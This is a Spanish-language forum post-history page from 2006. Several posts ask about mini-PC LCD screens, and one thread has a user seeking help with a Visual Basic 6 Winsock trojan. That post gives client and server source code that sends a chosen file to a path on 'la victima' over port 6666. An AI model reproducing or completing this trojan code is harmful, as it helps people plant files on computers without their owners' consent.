elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5
31  Informática / Electrónica / Re: Mini PC en: 19 Julio 2006, 20:02 pm
soy de argentina, por eso te preguntaba si conoces alguna casa que venda este tipo de pantallas, lo mas barato posible, o algun link de alguna empresa, o algo asi.

Lo que te preguntaba antes es si esos plasmas que puse en el link se enchufan y ya andan o hay que soldarle alguna pieza o algo por el estilo, igual parece ser que el precio esta mal por que viste que son re baratos? y dice que encima son pesos, no se que onda
32  Informática / Electrónica / Re: Mini PC en: 18 Julio 2006, 19:09 pm
Tenes algun link o algun dato interesante de donde conseguir este tipo de pantallas para poder hacer la adaptacion???
33  Programación / Programación Visual Basic / Re: Transferencia multiconecciones con winsock¡¡¡ en: 16 Julio 2006, 20:10 pm
no comprendo que me quisiste decir
34  Programación / Programación Visual Basic / Re: Transferencia multiconecciones con winsock¡¡¡ en: 16 Julio 2006, 19:16 pm
si estoy preguntando es por que no me sirvio lo que encontre...
35  Programación / Programación Visual Basic / Re: Transferencia multiconecciones con winsock¡¡¡ en: 16 Julio 2006, 00:44 am
si vas a poner cosas que no me interesen no postees Guardatelo. Obvio que no hay ninguna obligacion en contestarme pero este tema se hablo ya. Y no creo que nadie no pueda contestarme.
36  Programación / Programación Visual Basic / Re: Transferencia multiconecciones con winsock¡¡¡ en: 16 Julio 2006, 00:10 am
Hola que pasa que nadie me contesta?????????es  un codigo bastante sencillo
37  Informática / Electrónica / Re: Mini PC en: 15 Julio 2006, 06:27 am
Pero esos modulos se enchufan (me refiero a la energia 220/110 lo que sea), y ya comienzan a funcionar o requieren algun tipo de soldadura, conexión algo. Gracias

pd un barberone me parece muy grande quiero tratar de que  el min pc sea lo mas parecido a una notebook
38  Programación / Programación Visual Basic / Re: Transferencia multiconecciones con winsock¡¡¡ en: 15 Julio 2006, 06:21 am
Si alguien me puede contestar POR FAVOOOOOR!!!!!!! :huh: :huh: :huh: :huh: :huh:
39  Programación / Programación Visual Basic / Transferencia multiconecciones con winsock¡¡¡ en: 13 Julio 2006, 23:48 pm
Buenas la cuestion es la siguien resulta que estaba haciendo el troyano para una sola conexión y funcionaba perfecto, el tema es que cuando me meti a ver como hacerlo con muchas conexiones se me complico un poco, ya que no puedo transferir archivos, pero si ejecutarlos, no me tira ningun error ni nada simplemente cuando me voy a fijar si transfirio el archivo este no esta. Resumi un poco el code.

ACA VA EL CODE:

CLENTE

Código:
Dim filesize As Long, filedata As String, bytes As Long, directorio As String, socket As Variant
Private Sub Command1_Click()
cd.Filter = "Todos los archivos |*.*"  'pongo el filtro de los exes
cd.ShowOpen 'muestro la ventana para abrir el archivo
Open cd.FileName For Binary As #1 'abro el archivo en modo binario
filedata = Input(LOF(1), 1)'lo guardo
Close #1 'lo cierro
nombre = cd.FileTitle'guardo el nobre del archivo
directorio = InputBox("elige la ruta donde se" & vbCrLf & "guardara el archivo en la victima:" & vbCrLf & "Añade '\' al final!", "Ruta donde se guardara", directorio)'la ruta donde se guardara el archivo en el server
directorio = directorio & nombre'concateno
filesize = Len(filedata) 'calcula el tamaño en bytes'calculo el tamaño del archivo
ws2(socket).SendData "archivo" & "|" & filesize & "|" & directorio & "|" & filedata'mando estos datos
End Sub

Private Sub Form_Load()
ws.LocalPort = 6666
ws.Close
ws.Listen
End Sub

Private Function NuevoSocket() As Integer
Dim numElementos As Integer
Dim i As Integer
numElementos = ws2.UBound
For i = 0 To numElementos
If ws2(i).State = sckClosed Then
NuevoSocket = i
Exit Function
End If
Next
Load ws2(numElementos + 1)
NuevoSocket = ws2.UBound
End Function

Private Sub List1_Click()
socket = List1.Text
End Sub

Private Sub ws_ConnectionRequest(ByVal requestID As Long)
Dim numSocket As Integer
numSocket = NuevoSocket
ws2(numSocket).Accept requestID
List1.AddItem numSocket
End Sub

SERVIDOR

Código:
Dim filesize As Long, filedata As String, bytes As Long, directorio As String
Private Sub Form_Load()
ws.RemotePort = 6666
ws.RemoteHost = "127.0.0.1"
ws.Connect
End Sub

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
ws.GetData datos 'agarro los datos
If Left(datos, 7) = "archivo" Then 'si los primeros 7 caracteres son "archivo" entonces
    dato = Split(datos, "|") 'separo
    filesize = dato(1)
    directorio = dato(2)
    filedata = dato(3)
    Open directorio For Binary As #1 'abro un directorio, con la variable directorio
    Put #1, 1, filedata'y coloco el archivo
    Close #1'lo cierro
End If
End Sub
40  Informática / Electrónica / Mini PC en: 12 Julio 2006, 21:09 pm
Hola que tal la verdad que en electronica soy muy nuevo, por eso estoy posteando esta prengunta, resulta que quiero armarme una mini pc con el mother VIA EPIA N-Series Nano-ITX, si no lo conocen aqui les dejo un enlace,

http://www.via.com.tw/en/products/mainboards/nano_itx/epia_n/

lo que quiero hacer es encastrarle de alguna manera una pantalla lcd de unas determinadas pulgadas (todavia no lo decidi), y aqui viene el problema, empece a buscar pantallas lcd masomenos pequeñas, y no encontre mucho, lo que si encontre fue este enlace:

http://www.lcdtft.com/

lo que me intereso fueron los lcd modules, y ahi va la pregunta ¿Esos modulos como se arman, es decir como se conectan, o directamente se les pone una carcaza, se enchufan y ya esta?

esa es mi duda. Si alguien me la puede aclarar se lo agradeceria .

Gracias
Páginas: 1 2 3 [4] 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines